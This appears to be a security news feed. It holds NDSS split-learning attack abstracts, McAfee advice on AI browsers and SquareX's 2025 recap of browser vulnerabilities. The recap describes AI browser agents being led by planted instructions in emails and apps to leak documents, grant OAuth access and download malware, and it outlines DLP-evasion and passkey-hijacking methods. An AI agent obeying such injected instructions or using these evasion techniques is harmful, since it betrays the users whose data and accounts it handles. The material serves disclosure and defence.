Reading view

There are new articles available, click to refresh the page.

What makes smart secrets management essential?

How Are Non-Human Identities Revolutionizing Cybersecurity? Have you ever considered the pivotal role that Non-Human Identities (NHIs) play in cyber defense frameworks? When businesses increasingly shift operations to the cloud, safeguarding these machine identities becomes paramount. But what exactly are NHIs, and why is their management vital across industries? NHIs, often referred to as machine […]

The post What makes smart secrets management essential? appeared first on Entro.

The post What makes smart secrets management essential? appeared first on Security Boulevard.

How does Agentic AI empower cybersecurity teams?

Can Agentic AI Revolutionize Cybersecurity Practices? Where digital threats consistently challenge organizations, how can cybersecurity teams leverage innovations to bolster their defenses? Enter the concept of Agentic AI—a technology that could serve as a powerful ally in the ongoing battle against cyber threats. By enhancing the management of Non-Human Identities (NHIs) and secrets security management, […]

The post How does Agentic AI empower cybersecurity teams? appeared first on Entro.

The post How does Agentic AI empower cybersecurity teams? appeared first on Security Boulevard.

Ring-fencing AI Workloads for NIST and ISO Compliance 

AI is transforming enterprise productivity and reshaping the threat model at the same time. Unlike human users, agentic AI and autonomous agents operate at machine speed and inherit broad network permissions and embedded credentials. This creates new security and compliance … Read More

The post Ring-fencing AI Workloads for NIST and ISO Compliance  appeared first on 12Port.

The post Ring-fencing AI Workloads for NIST and ISO Compliance  appeared first on Security Boulevard.

Afghan Terrorism Is a Small Threat in the United States

10/12/25
TERRORISM
Enable IntenseDebate Comments: 
Enable IntenseDebate Comments

Very little new information has been released since Rahmanullah Lakanwal murdered West Virginia National Guard member Sarah Beckstrom in Washington, DC, two weeks ago. He also shot and injured Andrew Wolfe, another National Guardsman, in the same attack. Prosecutors have since charged Lakanwal with murder, assault with intent to kill while armed, and possession of a firearm during a violent crime. Terrorism charges are absent because prosecutors do not yet know his motives. The FBI is conducting a terrorism investigation to discover those.

read more

Trump Administration’s Immigrant Detention Policy Broadly Rejected by Federal Judges

12/10/25
IMMIGRTION
Enable IntenseDebate Comments: 
Enable IntenseDebate Comments

In federal courtrooms across America, a pattern has emerged in cases in which immigrants are being rounded up and jailed without a hearing. That’s a departure from fundamental constitutional protections in the U.S. that provide the right to a hearing before indefinite imprisonment.

read more

SafeSplit: A Novel Defense Against Client-Side Backdoor Attacks In Split Learning

Session 5C: Federated Learning 1

Authors, Creators & Presenters: Phillip Rieger (Technical University of Darmstadt), Alessandro Pegoraro (Technical University of Darmstadt), Kavita Kumari (Technical University of Darmstadt), Tigist Abera (Technical University of Darmstadt), Jonathan Knauer (Technical University of Darmstadt), Ahmad-Reza Sadeghi (Technical University of Darmstadt)

PAPER
SafeSplit: A Novel Defense Against Client-Side Backdoor Attacks in Split Learning

Split Learning (SL) is a distributed deep learning approach enabling multiple clients and a server to collaboratively train and infer on a shared deep neural network (DNN) without requiring clients to share their private local data. The DNN is partitioned in SL, with most layers residing on the server and a few initial layers and inputs on the client side. This configuration allows resource-constrained clients to participate in training and inference. However, the distributed architecture exposes SL to backdoor attacks, where malicious clients can manipulate local datasets to alter the DNN's behavior. Existing defenses from other distributed frameworks like Federated Learning are not applicable, and there is a lack of effective backdoor defenses specifically designed for SL. We present SafeSplit, the first defense against client-side backdoor attacks in Split Learning (SL). SafeSplit enables the server to detect and filter out malicious client behavior by employing circular backward analysis after a client's training is completed, iteratively reverting to a trained checkpoint where the model under examination is found to be benign. It uses a two-fold analysis to identify client-induced changes and detect poisoned models. First, a static analysis in the frequency domain measures the differences in the layer's parameters at the server. Second, a dynamic analysis introduces a novel rotational distance metric that assesses the orientation shifts of the server's layer parameters during training. Our comprehensive evaluation across various data distributions, client counts, and attack scenarios demonstrates the high efficacy of this dual analysis in mitigating backdoor attacks while preserving model utility.


ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.


Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSS Symposium 2025 Conference content on the Organizations' YouTube Channel.

Permalink

The post SafeSplit: A Novel Defense Against Client-Side Backdoor Attacks In Split Learning appeared first on Security Boulevard.

NDSS 2025 – Passive Inference Attacks On Split Learning Via Adversarial Regularization

Session 5C: Federated Learning 1

Authors, Creators & Presenters: Xiaochen Zhu (National University of Singapore & Massachusetts Institute of Technology), Xinjian Luo (National University of Singapore & Mohamed bin Zayed University of Artificial Intelligence), Yuncheng Wu (Renmin University of China), Yangfan Jiang (National University of Singapore), Xiaokui Xiao (National University of Singapore), Beng Chin Ooi (National University of Singapore)

PAPER
Passive Inference Attacks on Split Learning via Adversarial Regularization

Split Learning (SL) has emerged as a practical and efficient alternative to traditional federated learning. While previous attempts to attack SL have often relied on overly strong assumptions or targeted easily exploitable models, we seek to develop more capable attacks. We introduce SDAR, a novel attack framework against SL with an honest-but-curious server. SDAR leverages auxiliary data and adversarial regularization to learn a decodable simulator of the client's private model, which can effectively infer the client's private features under the vanilla SL, and both features and labels under the U-shaped SL. We perform extensive experiments in both configurations to validate the effectiveness of our proposed attacks. Notably, in challenging scenarios where existing passive attacks struggle to reconstruct the client's private data effectively, SDAR consistently achieves significantly superior attack performance, even comparable to active attacks. On CIFAR-10, at the deep split level of 7, SDAR achieves private feature reconstruction with less than 0.025 mean squared error in both the vanilla and the U-shaped SL, and attains a label inference accuracy of over 98% in the U-shaped setting, while existing attacks fail to produce non-trivial results.


ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.


Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSS Symposium 2025 Conference content on the Organizations' YouTube Channel.

Permalink

The post NDSS 2025 – Passive Inference Attacks On Split Learning Via Adversarial Regularization appeared first on Security Boulevard.

How to Stay Safe on Your New AI Browser

By: McAfee

AI-powered browsers give you much more than a window to the web. They represent an entirely new way to experience the internet, with an AI “agent” working by your side.

We’re entering an age where you can delegate all kinds of tasks to a browser, and with that comes a few things you’ll want to keep in mind when using AI browsers like ChatGPT’s Atlas, Perplexity’s Comet, and others.

What are agentic AI browsers?

So, what’s the allure of this new breed of browser? The answer is that it’s highly helpful, and plenty more.

By design, these “agentic” AI browsers actively assist you with the things you do online. They can automate tasks and interpret your intentions when you make a request. Further, they can work proactively by anticipating things you might need or by offering suggestions.

In a way, an AI browser works like a personal assistant. It can summarize the pages in several open tabs, conduct research on just about any topic you ask it to, or even track down the lowest airfare to Paris in the month of May. Want it to order ink for your printer and some batteries for your remote? It can do that too. And that’s just to name a few possibilities.

As you can see, referring to the AI in these browsers as “agentic” fits. It truly works like an agent on your behalf, a capability that promises to get more powerful over time.

Is it safe to use an AI browser?

But as with any new technology, early adopters should balance excitement with awareness, especially when it comes to privacy and security. You might have seen some recent headlines that shared word of security concerns with these browsers.

The reported exploits vary, as does the harm they can potentially inflict. That ranges from stealing personal info, gaining access to Gmail and Google Drive files, installing malware, and injecting the AI’s “memory” with malicious instructions, which can follow from session to session and device to device, wherever a user logs in.

Our own research has shown that some of these attacks are now tougher to pull off than they were initially, particularly as the AI browser companies continue to put guardrails in place. If anything, this reinforces a long-standing truth about online security, it’s a cat-and-mouse game. Tech companies put protections in place, bad actors discover an exploit, companies put further protections in place, new exploits crop up, and so on. It’s much the same in the rapidly evolving space of AI browsers. The technology might be new, but the game certainly isn’t.

While these reports don’t mean AI browsers are necessarily unsafe to use, they do underscore how fast this space is evolving…and why caution is smart as the tech matures.

How To Use an AI Browser Safely

It’s still early days for AI-powered browsers and understanding the security and privacy implications of their use. With that, we strongly recommend the following to help reduce your risk:

Don’t let an AI browser do what you wouldn’t let a stranger do. Handle things like your banking, finances, and health on your own. And the same certainly goes for all the info tied to those aspects of your life.

Pay attention to confirmations. As of today, agentic browsers still require some level of confirmation from the user to perform key actions (like processing a payment, sending an email, or updating a calendar entry). Pay close attention to them, so you can prevent your browser from doing something you don’t want it to do.

Use the “logged out” mode, if possible. As of this writing, at least one AI browser, Atlas, gives you the option to use the agent in the logged-out mode.i This limits its access to sensitive data and the risk of it taking actions on your behalf with your credentials.

If possible, disable “model learning.” By turning it off, you reduce the amount of personal info stored and processed by the AI provider for AI training purposes, which can minimize security and privacy risks.

Set privacy controls to the strictest options available. Further, understand what privacy policies the AI developer has in place. For example, some AI providers have policies that allow people to review your interactions with the AI as part of its training. These policies vary from company to company, and they tend to undergo changes. Keeping regular tabs on the privacy policy of the AI browser you use makes for a privacy-smart move.

Keep yourself informed. The capabilities, features, and privacy policies of AI-powered browsers continue to evolve rapidly. Set up news alerts about the AI browser you use and see if any issues get reported and, if so, how the AI developer has responded. Do routine searches pairing the name of the AI browser with “privacy.”

How McAfee Can Help

McAfee’s award-winning protection helps you browse safer, whether you’re testing out new AI tools or just surfing the web.

McAfee offers comprehensive privacy services, including personal info scans and removal plus a secure VPN.

Plus, protections like McAfee’s Scam Detector automatically alert you to suspicious texts, emails, and videos before harm can happen—helping you manage your online presence confidently and safeguard your digital life for the long term. Likewise, Web Protection can help you steer you clear of suspicious websites that might take advantage of AI browsers.

The post How to Stay Safe on Your New AI Browser appeared first on McAfee Blog.

Response to CISA Advisory (AA25-343A): Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure

AttackIQ has issued recommendations in response to the Cybersecurity Advisory (CSA) released by the Cybersecurity and Infrastructure Security Agency (CISA) on December 9, 2025, which details the ongoing targeting of critical infrastructure by pro-Russia hacktivists.

The post Response to CISA Advisory (AA25-343A): Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure appeared first on AttackIQ.

The post Response to CISA Advisory (AA25-343A): Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure appeared first on Security Boulevard.

2025 Year of Browser Bugs Recap: A Year of Unmasking Critical Browser Vulnerabilities

By: SquareX

At the beginning of this year, we launched the Year of Browser Bugs (YOBB) project, a commitment to research and share critical architectural vulnerabilities in the browser. Inspired by the iconic Months of Bugs tradition in the 2000s, YOBB was started with a similar purpose — to drive awareness and discussion around key security gaps and emerging threats in the browser.

Over the past decade, the browser has become the new endpoint, the primary gateway through which employees access SaaS apps, interact with sensitive data, and use the internet. The modern browser has also evolved significantly, with many capabilities that support complex web apps that parallel the performance of native apps. As with all new technologies, the very same features are also being used by malicious actors to exploit users, exploiting a massive security gap left by traditional solutions that primarily focus on endpoints and networks. Compounded with the release of AI Browsers, the browser has become the single most common initial access point for attackers. Yet, it remains to be poorly understood.

The YOBB project aims to demystify these vulnerabilities, by highlighting architectural limitations, behavioral trends and industry dynamics that cannot be fixed by a simple security patch. In the past 12 months, we released 11 research pieces, including major zero day vulnerabilities presented at DEF CON, Black Hat, RSA and BSides. Below is a recap of our findings, and the complete Year of Browser Bugs report is available for download here.

January 2025: Browser Syncjacking Attack

The Browser Syncjacking attack demonstrated that browser extensions, even just with simple read/write permissions available to popular extensions like Grammarly, can lead to full browser and device takeover by exploiting Google Workspace’s profile sync functionality. The attack unfolds in three escalating stages: profile hijacking, browser hijacking, and device hijacking.

  1. Profile Hijacking — the malicious extension, disguised as an AI tool, logs the user into an attacker managed Chrome profile while the user is idle. This immediately allows the attacker to disable security features in the browser. The attacker can then further trick the user into syncing Chrome with the managed Google profile, giving attackers full access to all credentials and browsing history stored locally.
  2. Browser Hijacking — the same extension intercepts legitimate downloads like Zoom updates, replacing the file with the attacker’s malicious executable containing an enrollment token and registry modifications. Believing they’re installing a Zoom update, the victim runs the file, which installs registry entries that convert their browser into a managed browser under the attacker’s Google Workspace control.
  3. Device Hijacking — The same malicious file can also inject registry entries enabling the extension to communicate with native applications directly, bypassing additional authentication requirements. With this connection established, attackers leverage the extension alongside the local shell to gain complete device access — executing system commands, covertly activating cameras and microphones, capturing keystrokes, and accessing all applications and sensitive data on the machine.

As covered by:

👉 Learn more on our technical blog & demo

February 2025: Polymorphic Extensions

Polymorphic extensions are malicious extensions that can silently impersonate any extension, such as password managers and crypto wallets. The attack exploits end users’ reliance on visual cues to determine whether what they are interacting with is safe, and the fact that extensions can change their icons and appearance on the fly without any user warning. With additional permissions, these malicious extensions can even disable the real extension while they impersonate them.

  1. The user installs and pins a malicious extension, masquerading as a productivity tool.
  2. After some time, the extension disables and impersonates the user’s password manager, by creating pixel-perfect replicas of the target extensions’ icon, HTML popups and workflows.
  3. The extension injects a HTML popup that prompts the user to re-login to their password manager.
  4. The user enters their master password, which is used by the attacker to login to the real password manager and access all passwords on the user’s vault.

As covered by:

👉 Learn more on our technical blog & demo

March 2025: Browser Native Ransomware

Browser-native ransomware represents a fundamental shift in ransomware delivery that enables ransomware attacks to be executed without any local files or process, bypassing traditional anti-ransomware and EDR tools. Due to the proliferation of cloud storage and SaaS services, over 80% of enterprise data now resides in the cloud and is primarily accessed through the browser. By combining identity attacks and agentic workflows, attackers can systematically exfiltrate and hold sensitive files and data hostage for ransom. While BNRs manifest in many ways, here a few case studies:

  • File Storage BNR — via consent phishing (i.e. OAuth attacks), the attacker tricks users into granting their malicious app permission to “see, edit, create and delete all Google Drive files”. With AI agents, the attacker then systematically exfiltrates and deletes all files in the drive, including those shared by colleagues & customers, leaving a ransom note in place threatening to leak the data.
  • Email BNR — similarly, disguised as a legitimate tool, the attacker’s app requests permissions to “read, compose, send and permanently delete all email from Gmail”. Once granted, the attacker exfiltrates all emails to identify every SaaS app the victim is registered with by scraping welcome, notification, and billing emails. Using an AI agent, the attacker systematically resets passwords to these apps, logs the victim out, exfiltrates all data, and uploads ransom notes demanding payment in exchange for passwords and not leaking the data.

As covered by:

👉 Learn more on our technical blog & demo

April 2025: Data Splicing Attacks

Disclosed at BSides SF, Data Splicing Attacks represent a new class of data exfiltration techniques capable of bypassing major enterprise DLP solutions listed by Gartner’s Magic Quadrant. The research exposed fundamental architectural flaws in both endpoint-based and proxy-based DLP solutions that allow attackers to upload/paste/print any sensitive data through the browser with several techniques:

  • Data Smuggling via Alternate Communication Channels — exfiltrating data via binary communication channels such as WebRTC and gRPC that are unmonitored by cloud SASE/SSE DLP or endpoint DLP solutions
  • Data Sharding — breaking files/data into small “shards” that individually do not trigger regex detection, only to reassemble them after DLP inspection
  • Data Ciphering — encrypting files, only to decrypt them after DLP inspection, exploiting the fact that most DLP solutions blanket block/allow encrypted files that they do not have decryption keys to inspect
  • Data Transcoding — encoding file/data with encoding techniques like Base64 such that they evade regex-based DLP policies, only to decode them post-inspection after file download or right before paste/upload
  • Data Insertion — inserting small characters in background color between texts to break regex, allowing sensitive files to be printed without triggering DLP policies

As covered by:

📽️ Watch the BSides SF talk here

May 2025: Fullscreen BitM

While Browser-in-the-Middle (BitM) attacks have been known since 2021, they typically come with a major telltale sign — the parent window still displays a suspicious URL in the address bar, raising suspicion among security-aware users. Our research discovered that the Fullscreen API can be exploited to address this flaw, as any user interaction can be used to trigger a fullscreen popup containing the attacker controlled noVNC window. Not knowing that they are now interacting with an attacker-controlled browser, the victim continues their work, unknowingly giving attackers access to watch everything they do as they open additional tabs and access enterprise apps, all while thinking they’re on their own browser.

  1. The user lands on a phishing site impersonating a popular SaaS app (like Figma) through malvertising or SEO poisoning.
  2. When the user clicks what appears to be a normal “Log in” button, it triggers the Fullscreen API to expand a previously hidden BitM window to fullscreen.
  3. The fullscreen window displays the attacker’s remote browser showing the legitimate login page, completely covering the parent window’s suspicious URL.
  4. The user enters their credentials on the real site displayed in the attacker’s remote browser, successfully logging in without any indication of compromise.
  5. The user continues working — opening additional tabs and accessing other enterprise apps — all within the attacker-controlled remote browser under constant surveillance.

While all browsers are vulnerable to Fullscreen BitM, the attack works especially well on Safari due to the complete lack of visual indicators when entering fullscreen mode.

As covered by:

👉 Learn more on our technical blog & demo

June 2025: Browser AI Agents: The “New Weakest Link”

Since OpenAI launched Operator, AI agents have exploded in adoption, with 79% of organizations deploying agentic workflows today. Unfortunately, these agents are trained to do tasks, not to be security aware, making them even more vulnerable than an average employee. We demonstrated how browser AI agents fall prey to rudimentary attacks like phishing and OAuth attacks, leading to data exfiltration and malicious file download. Critically, these agents operate at the same privilege level as users, having full access to the same enterprise resources with little guardrails on agentic workflows.

Since our research, multiple agentic AI providers have improved their security guardrails, often requiring permissions when high risk actions are performed. However, these features are built at the discretion of the AI vendor. There is yet to be an industry standard for AI vendors and enterprises alike when it comes to Agentic Identity and Agentic DLP, which becomes especially challenging with the volume of AI applications being built every day.

As covered by:

👉 Learn more on our technical blog & demo

July 2025: Architectural Limitations of Chrome DevTools

The past few years witnessed a surge in malicious browser extensions, including Geco Colorpick and the Cyberhaven breach. Most extensions are downloaded from official stores like Chrome Web Store, leading enterprises to heavily depend on browser vendors to conduct security audits, trusting labels like “Verified” and “Chrome Featured Extension” as security indicators. Unfortunately, attackers can easily game the system with fake reviews and mass downloads. Indeed, numerous verified extensions have been discovered as malicious.

Yet, there is still very little end users can do to inspect extension behaviors in the browser, even with the Developer Tools provided by browser vendors. This YOBB highlights how trivial it is for malicious extensions to hide suspicious activity from DevTools by exploiting several key limitations:

  • Difficulty debugging content and service workers simultaneously
  • No visibility into message passing and internal communications between extension components
  • No source attribution for injected JavaScript (webpage vs. extension)
  • Limited network traffic logging that extensions can easily circumvent
  • No insights into offscreen documents to inspect background processes, hidden extension pages, and time/action-triggered behaviors

As covered by:

👉 Learn more on our technical blog & demo

August 2025: Passkeys Pwned: Turning WebAuthn Against Itself

At DEF CON 33, we disclosed a major implementation flaw in passkeys that allows attackers to intercept and forge the passkey registration and authentication flows, replacing it with the attacker’s key pair.

  1. Via a malicious script/browser extension, the attacker force fails the passkey authentication, forcing the user to re-register their passkey
  2. The attacker intercepts the call during the passkey registration, and generates its own private and public key
  3. The malicious extension stores the private key locally (or sent to the attacker for login via their device) and sends the public key to the service provider’s server
  4. When an authentication occurs, the extension/script intercepts this call too and signs the challenge with the stored attacker private key
  5. Since the public key stored on the server is part of the malicious pair the attacker generated during registration, the authentication check succeeds

Note that in both the registration and authentication flow, the user still enters their biometrics/PIN, a visual indicator that many associate with good security. However, in both scenarios, the authenticator’s response is dropped and replaced with the attacker’s public key/signed challenge before it ever reaches the server.

As covered by:

👉 Learn more on our technical blog & demo

September 2025: Architectural Security Vulnerabilities of AI Browsers

When Perplexity released Comet in July 2025, it brought to light what the future of browsers could look like. Our research deep-dived into AI Browsers to uncover how attackers can exploit AI Browsers, including:

  • Falling into malicious workflows while surfing the internet — e.g. falling to consent phishing attacks while completing a research task, granting excessive OAuth permissions to malicious apps for full access to the user’s Gmail and Google Drive without the user’s knowledge
  • Falling into malicious instructions in trusted apps — e.g. following malicious instructions in emails & trusted SaaS apps to share confidential documents and add malicious links to calendar meetings
  • Downloading malicious files — e.g. downloading malware while trying to complete a form, even when the original user prompt never requested any downloads

Many other researchers in the community have also voiced similar concerns on prompt injection attacks that led AI Browsers to go rogue. Since then, popular AI Browsers like Comet and Atlas have started adding guardrails that require explicit user permissions for certain agentic tasks. This marks an encouraging example of what can be achieved when security researchers and innovators collaborate to make emerging technologies more secure.

As covered by:

👉 Learn more on our technical blog & demo

October 2025: AI Sidebar Spoofing

Building on our previous AI Browser research, AI Sidebar Spoofing attacks involve malicious extensions that can inject a pixel-perfect replica of AI sidebars. By impersonating the very interface that users trust to interact with these AI browsers, it then generates malicious instructions that eventually lead to phishing, malicious file download and even device takeover.

As covered by:

👉 Learn more on our technical blog & demo

November 2025: Comet MCP API

We discovered a poorly documented MCP API in Comet that allows its embedded extensions to execute arbitrary local commands without explicit user permission. Critically, the MCP API is made available by default to Comet’s embedded extensions, which is installed by default, hidden from the extension dashboard, and cannot be disabled by users even if it is compromised.

In our attack POC, we used extension stomping to demonstrate how the MCP API can be misused to execute ransomware. However, in reality, it is more likely that this exploit will be done via XSS and network MitM in the wild as it requires minimal end user involvement. One day after the release, Comet made a silent update that disabled the MCP API. While we have not received official acknowledgement of our bug report, the patch is a positive move towards making the AI Browser safer.

As covered by:

👉 Learn more on our technical blog & demo

Secure Any Browser and Any Device

SquareX’s browser extension turns any browser on any device into an enterprise-grade secure browser. SquareX’s industry-first Browser Detection and Response (BDR) solution empowers organizations to proactively defend against browser-native threats including rogue AI agents, Last Mile Reassembly Attacks, malicious extensions and identity attacks. Unlike dedicated enterprise browsers, SquareX seamlessly integrates with users’ existing consumer browsers, delivering security without compromising user experience.

Ready to experience award-winning browser security? Visit www.sqrx.com to learn more or sign up for an enterprise pilot.


2025 Year of Browser Bugs Recap:
A Year of Unmasking Critical Browser Vulnerabilities
was originally published in SquareX Labs on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post 2025 Year of Browser Bugs Recap:
A Year of Unmasking Critical Browser Vulnerabilities
appeared first on Security Boulevard.

NIST Plans to Build Threat and Mitigation Taxonomy for AI Agents

The U.S. National Institute of Standards and Technology (NIST) is building a taxonomy of attack and mitigations for securing artificial intelligence (AI) agents. Speaking at the AI Summit New York conference, Apostol Vassilev, a research team supervisor for NIST, told attendees that the arm of the U.S. Department of Commerce is working with industry partners..

The post NIST Plans to Build Threat and Mitigation Taxonomy for AI Agents appeared first on Security Boulevard.

When Vendors Become the Vulnerability: What the Marquis Software Breach Signals for Financial Institutions

In December 2025, a ransomware attack on Marquis Software Solutions, a data analytics and marketing vendor serving the financial sector, compromised sensitive customer information held by multiple banks and credit unions, according to Infosecurity Magazine. The attackers reportedly gained access through a known vulnerability in a firewall device connected to Marquis’s remote-access systems. The incident

The post When Vendors Become the Vulnerability: What the Marquis Software Breach Signals for Financial Institutions appeared first on Seceon Inc.

The post When Vendors Become the Vulnerability: What the Marquis Software Breach Signals for Financial Institutions appeared first on Security Boulevard.

❌